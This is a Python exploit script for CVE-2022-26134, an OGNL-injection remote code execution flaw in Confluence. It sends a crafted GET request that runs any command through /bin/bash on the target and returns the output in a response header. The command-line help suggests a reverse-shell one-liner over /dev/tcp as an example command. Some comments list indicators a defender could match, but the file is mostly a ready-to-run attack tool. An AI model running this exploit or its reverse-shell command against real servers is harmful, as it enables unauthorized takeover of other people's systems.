CVE-2022-26134.py
# !/usr/bin/python3
import argparse
import requests
from requests.packages import urllib3
# Silence urllib3 warnings, including the certificate-verification warning
# that the verify=False request in send_exp() would otherwise emit.
urllib3.disable_warnings()
# NOTE(review): this Session is never used in this file; send_exp() calls
# requests.get() directly.
session = requests.Session()
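def banner():
    """Print the tool's ASCII-art banner to stdout."""
    # Raw string: the art is full of backslashes that are not valid escape
    # sequences. In a normal literal they are deprecated and raise a
    # SyntaxWarning since Python 3.12; the printed text is unchanged.
    b = r'''
______ _______ ____ ___ ____ ____ ____ __ _ _____ _ _
/ ___\ \ / | ____| |___ \ / _ |___ \|___ \ |___ \ / /_ / |___ /| || |
| | \ \ / /| _| _____ __) | | | |__) | __) _____ __) | '_ \| | |_ \| || |_
| |___ \ V / | |__|_____/ __/| |_| / __/ / __|_____/ __/| (_) | |___) |__ _|
\____| \_/ |_____| |_____|\___|_____|_____| |_____|\___/|_|____/ |_|
'''
    print(b)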
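def send_exp(url: str, cmd: str):
    """Send the CVE-2022-26134 OGNL-injection request to ``url`` and report the outcome.

    The OGNL expression is carried in the request path. As written here it
    runs ``cmd`` through ``/bin/bash -c`` on the server and copies the process
    output into an ``X-Cmd-Response`` response header.

    Artifacts a defender can match on, all visible in this function: a GET
    whose path begins with a percent-encoded ``${`` (``/%24%7B``), the literal
    ``java.lang.ProcessBuilder`` inside the path, the fixed QQBrowser
    user-agent, and a 302 response that carries an ``X-Cmd-Response`` header.

    Args:
        url: Base URL of the target; the encoded expression is appended as-is.
        cmd: Command string embedded verbatim in the expression.

    Returns:
        Always a ``str``: the ``X-Cmd-Response`` header value on success,
        otherwise a failure message or the text of the exception raised.
    """
    exp = "/${(#l=new java.util.ArrayList()).(#l.add(\"/bin/bash\")).(#l.add(\"-c\")).(#l.add(\"" \
          + cmd + "\")).(#a=@org.apache.commons.io.IOUtils@toString(" \
                  "new java.lang.ProcessBuilder(#l).start().getInputStream(),\"utf-8\"))." \
                  "(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Cmd-Response\",#a))}/"
    exp = str_to_url(exp)
    exp_url = url + exp
    print(f"发送請求:{url}")  # "sending request"
    headers = {
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chro'
                      'me/53.0.2785.104 Safari/537.36 Core/1.53.2372.400 QQBrowser/9.5.10548.400'
    }
    try:
        # allow_redirects=False: the result header is read from the 302 itself.
        # verify=False: TLS certificate validation is skipped for this request.
        response = requests.get(exp_url, allow_redirects=False, headers=headers, verify=False)
        if response.status_code == 302 and 'X-Cmd-Response' in response.headers:
            result = str(response.headers['X-Cmd-Response'])
            return result
        else:
            return "命令执行失败"  # "command execution failed"
    except requests.exceptions.ConnectionError:
        return 'Failed to Connect: ' + url
    except Exception as e:
        # Return text, not the exception object: the caller concatenates the
        # result onto a str and would otherwise fail with a TypeError.
        return str(e)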
def str_to_url(string):
    """Percent-encode a fixed set of punctuation characters in ``string``.

    Only the sixteen characters listed below are rewritten as ``%XX``
    (uppercase hex of the code point); every other character, including
    ``%`` itself and any non-ASCII text, passes through untouched. This is
    therefore not a general-purpose URL encoder.
    """
    # { } ' ( ) @ " # = $ , ; space backslash [ ]
    to_encode = "{}'()@\"#=$,; \\[]"
    pieces = [
        "%" + format(ord(ch), "X") if ch in to_encode else ch
        for ch in string
    ]
    return "".join(pieces)
def exploit(url, cmd):
    """Public entry point: delegate to send_exp() and return whatever it returns."""
    outcome = send_exp(url, cmd)
    return outcome
if __name__ == "__main__":
    # CLI entry point: print the banner, parse the two required options,
    # issue a single request and print its result.
    banner()
    cli = argparse.ArgumentParser(description='CVE-2022-26134')
    cli.add_argument(
        '-t', '--target',
        dest='target', type=str, required=True,
        help='目标URL',  # "target URL"
    )
    cli.add_argument(
        '-c', '--command',
        dest='command', type=str, required=True,
        # "command to execute", followed by the author's example value
        help='执行命令,eg:bash -i >& /dev/tcp/{your ip}/{port} 0>&1',
    )
    parsed = cli.parse_args()
    outcome = exploit(parsed.target, parsed.command)
    print("执行结果:" + outcome)  # "execution result"